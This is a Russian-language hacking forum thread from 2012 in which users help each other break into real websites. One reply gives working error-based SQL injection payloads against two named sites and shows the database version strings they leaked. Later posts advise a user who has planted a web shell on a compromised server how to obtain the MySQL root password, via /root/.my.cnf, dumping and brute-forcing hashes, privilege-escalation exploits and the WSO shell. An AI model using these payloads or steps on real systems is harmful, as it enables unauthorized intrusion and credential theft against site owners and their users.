
20.08.2012, 18:35
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
С нами:
8603990
Репутация:
0
|
|
А такую уязвимость вообще реально раскрутить? https://p-on.ru/admin/
и
http://www.alarmtrade.ru/search/?search=UNION+SELECT+ids+FROM+pages+WHER'
Хотелось бы знать как.
|
|
|

20.08.2012, 19:01
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
по поводу p-on.ru:
в поле логин: ' or(1)group by(concat(version(),0x00,floor(rand(0)*2)))having( min(0)or(1))#)
message: Duplicate entry ' 5.0.45-community-nt' for key 1
по поводу: alarmtrade.ru:
Код:
http://www.alarmtrade.ru/search/?search='or(1)group/**/by(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))--+
Duplicate entry ' 5.1.58' for key 'group_key'
|
|
|

21.08.2012, 10:00
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Как достать пароль от mysql если есть доступ к корневой папке "/" ? Нашел там папку с апачем, но в нем по моему нету логин и пасс от mysql. В конфигах сайта через который лился только пользователь привязанный к бд сайта(( Там есть еще сайты, но смотреть каждый в лом.
И еще, как можно увидеть всю структуру сервера если залит шелл? Т.е все папки и под папки. Юзаю шелл 404
UPD. Нашел папку mysql, но зайти в нее не дает, есть ли варианты зайти в нее?
|
|
|

21.08.2012, 10:07
|
|
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
С нами:
7552406
Репутация:
724
|
|
Сообщение от WendM
Как достать пароль от mysql если есть доступ к корневой папке "/" ? Нашел там папку с апачем, но в нем по моему нету логин и пасс от mysql. В конфигах сайта через который лился только пользователь привязанный к бд сайта(( Там есть еще сайты, но смотреть каждый в лом.
И еще, как можно увидеть всю структуру сервера если залит шелл? Т.е все папки и под папки. Юзаю шелл 404
UPD. Нашел папку mysql, но зайти в нее не дает, есть ли варианты зайти в нее?
Юзать root. Прокачай систему до 20 левела с помощью сплоита.
|
|
|

21.08.2012, 10:16
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Сообщение от VY_CMa
Юзать root. Прокачай систему до 20 левела с помощью сплоита.
?? Можно подробней
|
|
|

21.08.2012, 17:49
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от VY_CMa
Юзать root. Прокачай систему до 20 левела с помощью сплоита.
вообще-то самый высокий уровень нулевой, а никак не 20
по сабжу, пароль от мюскл можно узнать в трех случаях:
имея рута на сервере и как правило пароль лежит тут: /root/.my.cnf
имея логин и пароль пользователя который не ограничен доступом в mysql.user, достал хеш рута => брут => профит
найти пароль в конфигах, логах, процессах
|
|
|

21.08.2012, 22:18
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
WendM
Не знаю как в шеле 404, но в wso есть возможность просто читать конкретный файл, если знаешь где папка MySQL то там же и конфиг, можешь прочитать конфиг на прямую.
НО нужно еще пасс расшифровать.
Или как писали если есть возможность заюзать сплоит и повысить права
|
|
|

22.08.2012, 04:57
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Сообщение от Teratex
WendM
Не знаю как в шеле 404, но в wso есть возможность просто читать конкретный файл, если знаешь где папка MySQL то там же и конфиг, можешь прочитать конфиг на прямую.
Сообщение от WendM
Нашел папку mysql, но зайти в нее не дает,
|
|
|

22.08.2012, 05:00
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Ребята, вы так и не дали ответ на мой еще один вопрос. В каком шеле можно посмотреть дерево каталогов?, т.е все папки и под папки
|
|
|

22.08.2012, 05:02
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами:
7854806
Репутация:
173
|
|
Сообщение от WendM
Ребята, вы так и не дали ответ на мой еще один вопрос. В каком шеле можно посмотреть дерево каталогов?, т.е все папки и под папки
WSO.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|